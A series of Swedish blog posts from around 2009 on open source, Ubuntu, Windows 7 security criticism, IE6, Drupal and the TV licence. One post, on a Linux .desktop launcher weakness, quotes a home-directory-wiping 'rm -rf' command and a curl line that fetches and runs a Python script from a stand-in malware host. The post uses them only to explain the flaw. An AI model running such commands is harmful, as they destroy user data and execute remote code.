Precis som Little John skrev i sin bloggpost så anordnar Ubuntu Sverige träffar över hela Sverige i samband med lanseringen av Ubuntu 9.10 Karmic Koala. Vi står inför en spännande tid. Om två dagar släpps Windows 7, där Microsoft verkar ha fått merparten av sina grejer att funka på ett väldigt bra sätt. Mac OS X Snow Leopard har släppts för inte alltför länge sedan och dessa tre kommer att få kämpa om användarna en tid framöver.
Givetvis har Microsoft en stor fördel av sin marknadsföringsbudget, men gemenskapen har alltid varit Ubuntus starka kort. Jag hoppas att den kommer att växa och utvecklas till något som kommer vanliga människor till del. Jag vet att jag kommer jobba mitt allra bästa för att få det att ske, och jag känner mig priviligierad att ha så många talangfulla och drivna människor att jobba med som det finns inom Ubuntu i Sverige.
Vi i Ubuntu Sverige inbjuder härmed alla som är intresserade av att titta närmare på öppen källkod, Linux och Ubuntu att delta i våra festligheter. Ni kan läsa om dem på fosskalendern.se och läsa pressreleasen här.
Välkomna!
Läs även andra bloggares åsikter om datorer, fri programvara, it, linux, ubuntu, öppen källkod
Inspirerad av Tobias Strandhs podcast från i somras tänkte jag att om han kan göra det, så kan jag. Även om produktionsförhållandena inte var optimala (mest nattarbete när sonen sov) så har jag lyckats producera en 69 minuter lång podcast om fri programvara, öppen källkod, öppna standarder och software freedom day. Det är ju snart dags för SFD, närmare bestämt lördagen den 19 september.
Nåväl, för de som vill njuta av min torra stämma, tjugo minuter (minst) creative commons-licensierad musik och halvt om halvt väl underbyggda argument, ladda ner i en eller annan version, via bitTorrent.
Happy listening. 
PS. Den större filstorleken på OGG-filen har att göra med att den kör i 256kbit/s och därför är av högre kvalitet än MP3-filen. Det är så oavsett om det är meningsfullt eller inte.. DS.
Det här börjar likna lite av en Microsoft-bashande blogg, men jag blir så bestört över hur konstiga beslut som Microsoft tar om säkerheten för sina användare. Samtidigt blir jag lite avundsjuk över att Windows-plattformen blir så genomlyst som den blir. Jag är övertygad om att Linux- och Öppen källkods-världen i stort hade mått bra av en liknande överhalning också.
Ars Technica skriver hur som helst om ytterligare en säkerhetslucka i UAC (User Account Control) på Windows 7. Denna handlar om att vissa processer automatiskt får frikort att köra i eleverat (jag vet inte ens vad det heter i officiell översättning) läge. Detta gäller bland annat för RUNDLL32.exe som har möjlighet att i princip köra vilka DLL-filer som helst.
En annan aspekt enligt artikeln är att bland annat Explorer (alltså filhanteraren) automatiskt får köra vissa operationer med eleverade rättigheter, vilket kan utnyttjas att skapa filer på ställen där filer normalt inte får skapas av användaren. Genom andra exploits, t ex att vara tillåten att köra potentiellt farlig kod i andra processer så länge dessa körs med samma användar-ID, kan man därför göra många skadliga operationer på datorn.
I ett försök att komma undan från att behöva visa UAC-dialogen i alla lägen har Microsoft gjort undantag för sig själva. Jag citerar ur artikeln:
”..med Windows 7, säger Microsoft att ‘det är helt okej för tredjepartsprogram, men det duger inte åt oss; vi tycker inte att våra program ska visa användarna några dialogrutor, även då de gör något som kräver elevering [av systemrättigheter].’ Microsofts egen mjukvara pliktar inte längre själv för att utföra eleverade åtgärder (det händer i tysthet och med automatik), så den behöver inte utformas för att undvika det. Tredjepartsprogramvara som utför en sådan operation – t ex skapa katalog i en skyddad plats – visar en UAC-dialog. Explorer, å sin sida, gör det inte.
I min åsikt är detta störtlöjligt. Antingen är dessa operationer farliga och bör generera dialogrutor, eller så är de inte det och gör det inte. Att som Microsoft säga att de bara är farliga om andra människors program gör dem gör alltsammans till nonsens. Tredjepartsprogramvara måste välja mellan att undvika att göra operationen över huvud taget eller att generera en prompt/dialog. Microsoft kan göra den oavsett; Redmond behöver inte längre bry sig.”
Artikelförfattaren tycker att Microsoft borde laga UAC eller skrota det helt.
Ta inte mitt ord som sanning, läs artikeln själva.
Flera stora tunga nyhetssajter i Norge har börjat bojkotta IE6 och det är fan-ta-mig på tiden. IE6 är åtta år, vilket i internet-tid är ett veritabelt fossil.
Även i Sverige börjar kampanjen ta fart och bloggen Mindpark är drivande. Följ utvecklingen på Twitter.
Tack Norge för att ni inte bara knyter näven i fickan. Jag är lite bitter att jag inte tog tag i det här när jag hade tänkt, med mitt ofärdiga projekt bytbrowser.se, men det är bra att det händer någonstans ifrån i alla fall.
Jag hoppas givetvis att de användare som fortfarande kör IE6 byter till Safari, Firefox, Chrome eller vilken annan webbläsare som helst som gör att vi får bort styggelsen Internet Explorer från webben, för bloggmotorn Trident som används är helt enkelt rätt så värdelös att bygga vidare på.
Men en uppgradering är väl det minsta man kan begära.
Det sköna är att det inte är privatpersoner i första hand som är de som är de stora bovarna i dramat. Det är IT-chefer som inte får tummen ur arslet och uppgraderar.
”Den store bøygen er ikke uerfarne PC-brukere som ikke skjønner at de må oppgradere. Den store bøygen er de som burde visst dette bedre enn noen andre: IT-sjefer.
Dessverre er det slik at mange IT-avdelinger har standardisert på Internett Explorer 6. Det gjelder både private bedrifter, kommuner, skoler, og statlige etater. Selv IT-selskaper som lever av å tilby kundene sine et oppdatert og velfungerende IT-miljø holder igjen på en gammel nettleser.”
Alle vil bli kvitt Internett Explorer 6
Microsoft støtter IE6-kampanjen
Till och med Microsoft själva vill att man uppgraderar. Jag ser ju helst att man väljer bort IE helt och hållet.
Det är inte alldeles sällan som man får höra talas om att Linux är ‘omöjligt att infektera med virus’ och även om det går kommer standard-försvaret ‘det finns så få att riskerna är obefintliga’ obevekligen att komma upp.
Nu har en snubbe som kallar sig foobar (vad annars?) gjort en steg-för-steg-guide hur man skriver ett virus (jag använder termen löst här) som kan bifogas till ett epostmeddelande och sedan förstöra det mesta i en användares hemkatalog och sprida sig själv vidare.
Sårbarheten finns i filer som oftast har ändelsen .desktop och detta har diskuterats redan 2006, men ingen har gjort något åt problemet. Problemet ligger i att i .desktop-filerna finns det möjlighet att skriva in en kommandorad som exekveras med användarens nuvarande rättigheter.
Denna kommandorad skulle kunna vara ”rm -rf ~/*” vilket skulle ta bort användarens hela hemkatalog.
För att en fil ska vara exekverbar måste en körbar-flagga vara satt (+X för ‘eXecutable’).
Epostklienterna i Linux kan (får) inte göra bifogade filer körbara, men det innebär inte att skrivbordsmiljöerna (KDE, Gnome) inte får det. Och inte ens Linux är immunt mot användares dumhet och okunnighet.
Både KDE och Gnome har för en gångs skull enats om en standard på så kallade ”launchers”, dvs. filer som kan starta program. Dessa har oftast ändelsen .desktop och gemensamt för båda skrivbordsmiljöerna är att exekverbar-flaggan inte behöver vara satt för att dessa ska gå att köra. En workaround som inte direkt fått något bra resultat ur säkerhetssynpunkt.
Ett problem – för virusskaparna – med dessa filer är att de bara kan köra ett kommando på en rad. Det är ju enkelt fixat genom en rad som ser ut exempelvis såhär:
% bash -c ”curl http://www.malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
Detta kommando hämtar hem en python-fil från en server och exekverar den lokalt. Under förutsättning att man har python installerat då förstås, men principen är densamma oavsett.
Detta öppnar upp för stora luckor, för även om det inte går att bli root utan användarinteraktion så kan man seriöst paja en användares filer ändå.
Foobar har även postat en follow-up från all återkoppling h*n fått från sina läsare.
Jag hoppas att man genom att belysa problemet hittar en lösning på det. Snabbt.
Sitter och läser en artikel på slashdot (/.) om hur en helt legitim kopia av Photoshop CS4 slutade fungera efter ett ”hack” (byta ut en .dll) för att ta bort en störande registreringsruta. Det var kanske inte någon överraskning.
Jag har gjort en lös översättning av budskapet:
”Vad som däremot var en överaskning var att Windows 7 gav tillåtelse till program som Photoshop att lägga in sig själva i undantagsreglerna i brandväggen. Vidare att det är möjligt för stora programvaruleverantörer att genom svagheter i operativsystemet penetrera din dator.
Vad som är ännu mer oroande är att dessa svagheter är ansvariga för att ha pajat ett program baserat på en modifierad .dll-fil. Detta möjliggör fjärr-attestering. Att sedan komma fram till att operativsystemet till och med efter en reboot har låst dig ute från din egen Lokala Inställningar-katalog, förbjuder dig rättigheter att flytta eller ta bort den modifierade DLL-filen och vägrar att tillåta ersättning av Lokala Inställningar-katalogen efter att den är upplåst med Unlocker för att flytta den till Skrivbordet för undersökning (där det också nekar åtkomst till din egen katalog/mapp).
Inställningsmöjligheterna för ”tillåt alla” var disabled. Angående mediafiler är de dagar då man kunde spela in en ljudström på din dator räknade, om programet har sitt ursprung i din dator (webb-radio, antar jag h*n menar, övers.anm.). Ingångarna till ditt ljudkort blir rejält kvalitetsförsämrade om ljudkortet också spelar en ljudström (testat här med Grooveshark).
Under XP kunde du välja ”Stereo mix” eller liknande under ingångar för ljudinspelning och enkelt spela in vilket program som än spelade. Microsoft verkar gå till sängs med Big Music av sina egna skäl som inte hör samman med kundtillfredsställelse. Detta kan vara toppen på ett isberg. Något riktigt vidrigt lurar under ytan på Windows 7.
Att dela säng med RIAA är illa nog, men att låsa dina egna filer för dig är så osannolikt dåligt att de kan döda Windows 7 för många människor. Många användare kommer inte att vilja experimentera med ett andra ljudkort eller en andra dator bara för att spela in ljud från online-källor, eller starta upp i Linux som stödjer ntfs-3g bara för att kunna kontrollera sina filer. (Det verkar inte som att du någonsin kan förutse när ”Access Denied”-meddelandet kommer att slå till i Windows 7 igen.)
Det börjar stå allt mer klart varför det kommande WinFS inte kommer att vara en bra grej för användarna, och en Väldigt Bra Grej för Microsoft och deras partners.”
Jag vet inte hur mycket sanning det ligger i detta, men det hade varit intressant att höra några åsikter. Gärna välbalanserade och faktaspäckade, men fanboi-kommentarer fungerar de också. Från alla läger 
CIO Sweden skriver om Avis som fastnat för Sugar Customer Relations Management med öppen källkod. Systemet levereras av Redpill Linpro, ett företag som till och med sommaren 2008 var två, nämligen Redpill och Linpro.
Avis CRM-chef, Tom Orvei, är också glad över affären:
- Vi hade ingen tidigare erfarenhet av open source hos Avis. Ett naturligt första steg var därför att se på proprietära lösningar, som passar i vår existerande Microsoftmiljö. Det nya systemet skulle vara flexibelt och det skulle vara möjligt att vända sig till en extern samarbetspartner för rådgivning och support. Det gick dock snabbt upp för oss att en open source-lösning var lika stark och lika lätt att integrera i vår existerande it-miljö som de konventionella lösningarna.
En instruktion om hur du kan köra SugarCRM under Ubuntu Linux återfinns här.
Edenströms CMS-blogg meddelar att TV3.se har gått över till Drupal. Hela MTG-koncernen hoppas migrera sina 40-talet sajter till Drupal, även om det är frivilligt att gå över för de individuella sajterna.
Drupal är ett Content Management System (CMS) eller innehållshanteringssystem (jösses vilket alfapet-ord) byggd med öppen källkod i programmeringsspråket PHP.
Tidigare har även Dagens Industris webTV (ditv.se) gått över till Drupal, vilket gör Bonniers till en annan av de stora svenska kunderna. Efter kommer di.se att följa i sinom tid. Di.se kommer tydligen att bli en av världens största Drupal-installationer. Det ska bli intressant att se hur Drupal skalar upp till den dryga miljonen besökare som di.se har i veckan.
Även en del av Bonniers andra sajter kör Drupal, bland andra Newsmill.
TV3.se är ytterligare en fjäder i hatten för Drupal Sverige, med andra ord. Trevligt att man börjar inse affärsnyttan med öppen källkod. Det blir många utvecklartimmar för priset av en Polopoly-installation.
Windows 7 på netbook-datorer? Jodå, det ska funka fint med Windows 7 Starter Edition. Det måste vara någon typ av tidigt april-skämt. I Starter Edition har Microsoft nämligen lagt begränsningar på hur många samtidiga program du får köra. I någon undersökning som de nyss gjort har Microsoft kommit fram till att de flesta användare kör bara två applikationer åt gången.
Tvärtemot vad de ska ha sagt på utvecklarkonferensen PDC där de hävdade att 70% av Microsoft-användarna har mellan åtta och femton fönster uppe samtidigt.
Hur som helst ska Starter Edition enligt artikeln ha en begränsning på tre samtidiga applikationer, exklusive antivirusprogram. Exempel: Skype, MSN och webbläsaren, sen är det fullt.
Det, mina vänner, är humor på hög nivå.
Alltså, jag gillar tanken med public service. Att ha ett allmänt tillgängligt TV-utbud utan reklamavbrott (om man undantar de påannonser som kan störa åtminstone mig rätt rejält ibland). Även om SVT är långt ifrån opartiskt så strävar de åtminstone inte efter att bli en plattform för att enbart sälja reklam mellan skitdåliga amerikanska serier, som kanalerna 3-6 gör.
Vad jag inte gillar är när man utnyttjar en potentiell möjlighet som faktum och tar betalt för den. Att svenska företag och privatpersoner ska betala den nya formen av TV-licens för att de har möjlighet att se på SVT och lyssna på SR via nätet är helt förkastligt. Computer Sweden tar upp ett exempel att ett företag med 300 datorer ska betala 60 000 kronor per år (en licens per tio mottagare) även om väldigt få företag ser med blida ögon på tv-tittande under arbetstid. För privatpersoner blir det ännu värre.
Min nästa affärsidé kommer därför att bli att starta en porrvideosajt som helt finansieras av licenspengar. Förvänta dig att få hem en faktura i ett diskret svart kuvert (ahaaa, porr!) och punga upp så snart som möjligt. Du har ju faktiskt möjlighet att ta del av mitt utbud.
Jag kommer att ha indrivare också, eller så kallade pejlare. De heter Dragan och Zoran.
Molnigt på idg.se?
